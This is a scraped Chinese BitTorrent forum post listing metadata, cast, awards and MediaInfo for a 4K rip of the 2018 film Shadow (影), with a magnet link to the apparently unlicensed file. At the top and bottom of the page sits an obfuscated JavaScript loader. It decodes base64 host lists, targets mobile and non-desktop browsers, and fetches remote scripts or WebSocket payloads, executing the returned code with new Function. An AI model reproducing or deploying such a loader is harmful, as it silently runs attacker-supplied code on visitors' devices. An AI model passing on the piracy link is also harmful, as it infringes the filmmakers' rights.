影[国语音轨/中文字幕].Ying.2018.2160p.BluRay.x265.10bit.TrueHD.MA 10.80GB

版主小s 27天前 219

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 影 / 三国·荆州 / 荆州保卫战 / Shadow

◎年 代 2018

◎产 地 中国大陆 / 中国香港

◎类 别 剧情 / 动作 / 武侠 / 古装

◎语 言 汉语普通话

◎上映日期 2018-09-30(中国大陆) / 2018-09-06(威尼斯电影节)

◎IMDb链接 https://www.imdb.com/title/tt6864046/

◎豆瓣评分 7.2/10 (528832人评价)

◎豆瓣链接 https://movie.douban.com/subject/4864908/

◎片 长 116分钟

◎导 演 张艺谋 Yimou Zhang (id:1054398)

◎编 剧 李威 Wei Li (id:1389604)

张艺谋 Yimou Zhang (id:1054398)

朱苏进 Sujin Zhu (id:1275244)

◎演 员 邓超 Chao Deng (id:1274235)

孙俪 Li Sun (id:1004856)

郑恺 Kai Zheng (id:1275564)

王千源 Qianyuan Wang (id:1314827)

王景春 Jingchun Wang (id:1275934)

胡军 Jun Hu (id:1032540)

关晓彤 Xiaotong Guan (id:1276032)

吴磊 Leo Wu (id:1276150)

封柏 Bai Feng (id:1364294)

(id:1391142)

罗嘉孟 Jiameng Luo (id:1406329)

张逸 Yi Zhang (id:1406330)

丁紫宸 Zichen Ding (id:1410868)

吴了了 Liaoliao Wu (id:1410869)

范宇鹏 Yupeng Fan (id:1406335)

阚增 Zeng Kan (id:1406332)

魏凡翔 Fanxiang Wei (id:1406333)

郑志昊 Zhihao Zheng (id:1397531)

于冬 Dong Yu (id:1317865)

张昭 Zhao Zhang (id:1397618)

艾秋兴 Ellen Eliasoph (id:1402159)

陈砺志 Lizhi Chen (id:1400325)

陈美静 Meijing Chen (id:1406323)

庞丽薇 Liwei Pang (id:1406322)

程武 Wu Cheng (id:1406349)

捞仔 Loudboy (id:1308940)

艾鹏飞 Pengfei Ai (id:1406326)

赵小丁 Xiaoding Zhao (id:1274347)

赵曌 Zhao Zhao (id:1406324)

白小妍 Xiaoyan Bai (id:1406328)

陈宙飞 Zhoufei Chen (id:1406336)

陈庥宏 Xiuhong Chen (id:1406350)

赵显章 Xianzhang Zhao (id:1406352)

张宇 Yu Zhang (id:1406351)

周肖林 Xiaolin Zhou (id:1365738)

郜子瑜 Ziyu Gao (id:1401860)

庞涵 (id:1408647)

马光荣 Horace Ma (id:1330613)

刘绍春 Shaochun Liu (id:1384980)

肖松 Song Xiao (id:1406347)

陶雯婷 Wenting Tao (id:1406331)

孙启阳 Qiyang Sun (id:1457939)

陈敏正 Minzheng Chen (id:1346314)

徐孝顺 Xiaoshun Xu (id:1401247)

付璐璐 Lulu Fu (id:1401800)

魏然 Wei Ran (id:1406325)

周正飞 Zhengfei Zhou (id:1406334)

任茂成 Maocheng Ren (id:1401816)

牛晓宁 Xiaoning Niu (id:1461348)

杨江 Jiang Yang (id:1351381)

赵楠 Nan Zhao (id:1325307)

韩军生 Junsheng Han (id:1433302)

王星会 Samson Sing Wun Wong (id:1401244)

费鹰 Fei Ying (id:1426708)

张涛 Tao Zhang (id:1401246)

谷轩昭 Huan-Chiu Ku (id:1289063)

封柏 Bai Feng (id:1364294)

唐腾飞 Tengfei Tang (id:1406345)

冯伟伦 Wai Lun Fung (id:1406337)

吴胡斯乐 Husile Wu (id:1406344)

魏博 Bo Wei (id:1406346)

黄海 Hai Huang (id:1401245)

曲思义 Szu-Yi Chu (id:1414958)

◎标 签 水墨 / 视觉艺术 / 古装 / 黑白 / 武侠 / 中国大陆 / 人性 / 2018

◎简 介

战乱年代,群雄并起。割据一方的沛国安于现状,一任国主沛良(郑恺 饰)慨歌太平。要冲之地境州早年为强邻炎国借去,而今据而不还。沛国都督子虞(邓超 饰)前往讨伐,却中了对方大将杨苍(胡军 饰)的拖刀,重伤不愈。心有不甘的子虞暗中派出替身境州(邓超 饰)假扮自己,总理军政,内则使令夫人小艾(孙俪 饰)襄助。真假子虞切磋战法,寻求破解杨苍刀法的绝技。而另一方面,沛良恼怒子虞私自约战杨苍,不惜将妹妹青萍(关晓彤 饰)嫁于杨苍之子为妾媾和。淫雨霏霏,连日不开。境州上空,杀戮与机谋纠缠撕裂……

本片根据朱苏进的剧本《三国?荆州》改编。

◎获奖情况 (共23项)

第55届台北金马影展 (2018)

金马奖 最佳剧情片(提名)

金马奖 最佳导演

└──张艺谋 (id:1054398)

金马奖 最佳男主角(提名)

└──邓超 (id:1274235)

金马奖 最佳女主角(提名)

└──孙俪 (id:1004856)

金马奖 最佳改编剧本(提名)

金马奖 最佳摄影(提名)

└──赵小丁 (id:1274347)

金马奖 最佳美术设计

└──马光荣 (id:1330613)

金马奖 最佳造型设计

└──陈敏正 (id:1346314)

金马奖 最佳动作设计(提名)

└──谷轩昭 (id:1289063)

金马奖 最佳原创配乐(提名)

└──捞仔 (id:1308940)

金马奖 最佳音效(提名)

金马奖 最佳视觉效果

└──王星会 (id:1401244)

第39届香港电影金像奖 (2020)

最佳亚洲电影(提名)

第32届中国电影金鸡奖 (2019)

最佳摄影(提名)

└──赵小丁 (id:1274347)

最佳美术(提名)

└──马光荣 (id:1330613)

第13届亚洲电影大奖 (2019)

最佳摄影

└──赵小丁 (id:1274347)

最佳剪接(提名)

└──周肖林 (id:1365738)

最佳原创音乐(提名)

└──捞仔 (id:1308940)

最佳美术指导

└──马光荣 (id:1330613)

最佳造型设计

└──陈敏正 (id:1346314)

最佳音响

第67届美国音效剪辑协会奖 (2020)

金卷轴奖 最佳外语片音效剪辑(提名)

第26届北京大学生电影节 (2019)

最佳观赏效果奖

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 182212896633499094413820938215421492007 (0x8914ED694CC74B909EC2D4C45ED1BB27)

  4. Complete name : [email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.8 GiB

  8. Duration : 1 h 55 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 13.3 Mb/s

  11. Movie name : Ying.2018

  12. Encoded date : UTC 2021-10-26 02:44:34

  13. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  14. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  15. Video

  16. ID : 1

  17. Format : HEVC

  18. Format/Info : High Efficiency Video Coding

  19. Format profile : Main [email protected]@Main

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 55 min

  22. Bit rate : 8 544 kb/s

  23. Width : 3 840 pixels

  24. Height : 1 608 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 24.000 FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.058

  32. Stream size : 6.92 GiB (64%)

  33. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  34. Encoding settings : rc=crf / crf=22.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541049583 / frame-threads=5 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=3840x1608 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  35. Language : Chinese

  36. Default : Yes

  37. Forced : No


  38. Audio

  39. ID : 2

  40. ID in the original source medium : 4352 (0x1100)

  41. Format : MLP FBA 16-ch

  42. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  43. Commercial name : Dolby TrueHD with Dolby Atmos

  44. Codec ID : A_TRUEHD

  45. Duration : 1 h 55 min

  46. Bit rate mode : Variable

  47. Bit rate : 4 686 kb/s

  48. Maximum bit rate : 7 278 kb/s

  49. Channel(s) : 8 channels

  50. Channel layout : L R C LFE Ls Rs Lb Rb

  51. Sampling rate : 48.0 kHz

  52. Frame rate : 1 200.000 FPS (40 SPF)

  53. Compression mode : Lossless

  54. Stream size : 3.80 GiB (35%)

  55. Title : Mandarin

  56. Language : Chinese

  57. Default : Yes

  58. Forced : No

  59. Original source medium : Blu-ray

  60. Number of dynamic objects : 11

  61. Bed channel count : 1 channel

  62. Bed channel configuration : LFE


  63. Text #1

  64. ID : 3

  65. ID in the original source medium : 4768 (0x12A0)

  66. Format : PGS

  67. Muxing mode : zlib

  68. Codec ID : S_HDMV/PGS

  69. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  70. Duration : 1 h 44 min

  71. Bit rate : 19.8 kb/s

  72. Count of elements : 2206

  73. Stream size : 14.8 MiB (0%)

  74. Title : cht

  75. Language : Chinese

  76. Default : No

  77. Forced : No

  78. Original source medium : Blu-ray


  79. Text #2

  80. ID : 4

  81. ID in the original source medium : 4769 (0x12A1)

  82. Format : PGS

  83. Muxing mode : zlib

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 1 h 44 min

  87. Bit rate : 18.5 kb/s

  88. Count of elements : 2206

  89. Stream size : 13.9 MiB (0%)

  90. Title : chs

  91. Language : Chinese

  92. Default : Yes

  93. Forced : No

  94. Original source medium : Blu-ray


  95. Text #3

  96. ID : 5

  97. ID in the original source medium : 4770 (0x12A2)

  98. Format : PGS

  99. Muxing mode : zlib

  100. Codec ID : S_HDMV/PGS

  101. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  102. Duration : 1 h 44 min

  103. Bit rate : 22.7 kb/s

  104. Count of elements : 2206

  105. Stream size : 17.0 MiB (0%)

  106. Language : English

  107. Default : No

  108. Forced : No

  109. Original source medium : Blu-ray


  110. Menu

  111. 00:00:00.000 : en:第 01 章

  112. 00:12:37.708 : en:第 02 章

  113. 00:24:52.208 : en:第 03 章

  114. 00:32:30.166 : en:第 04 章

  115. 00:41:19.666 : en:第 05 章

  116. 00:50:24.875 : en:第 06 章

  117. 01:05:11.958 : en:第 07 章

  118. 01:18:52.375 : en:第 08 章

  119. 01:23:47.125 : en:第 09 章

  120. 01:27:02.958 : en:第 10 章

  121. 01:33:11.375 : en:第 11 章

  122. 01:47:58.416 : en:第 12 章




复制代码


TAGS 武侠 动作 剧情 古装

磁力链:
  • magnet:?xt=urn:btih:F19C9F580B48EB5AF732D3F0A08712A94FC1BBA3

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};